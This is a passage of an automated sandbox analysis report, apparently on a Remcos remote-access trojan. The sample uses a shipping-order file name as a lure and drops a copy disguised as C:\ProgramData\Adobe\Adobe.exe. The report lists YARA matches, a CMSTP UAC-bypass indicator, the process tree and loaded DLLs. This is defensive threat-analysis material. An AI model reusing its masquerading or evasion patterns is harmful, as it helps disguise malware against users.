                    Source: 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000000.00000002.2047465840.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 3668, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 7152, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Adobe.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@20/5@1/2
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,3_2_00416AB7
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,3_2_0040E219
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource,3_2_0041A63F
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,3_2_00419BC4
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.logJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeMutant created: NULL
                    Source: C:\ProgramData\Adobe\Adobe.exeMutant created: \Sessions\1\BaseNamedObjects\Adobe_Nov-3XE9WN
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeReversingLabs: Detection: 65%
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeFile read: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe "C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe"
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess created: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe "C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe"
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"
                    Source: unknownProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"
                    Source: unknownProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"
                    Source: unknownProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess created: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe "C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe" Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"Jump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeProcess created: C:\ProgramData\Adobe\Adobe.exe "C:\ProgramData\Adobe\Adobe.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: version.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: version.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: version.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: version.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
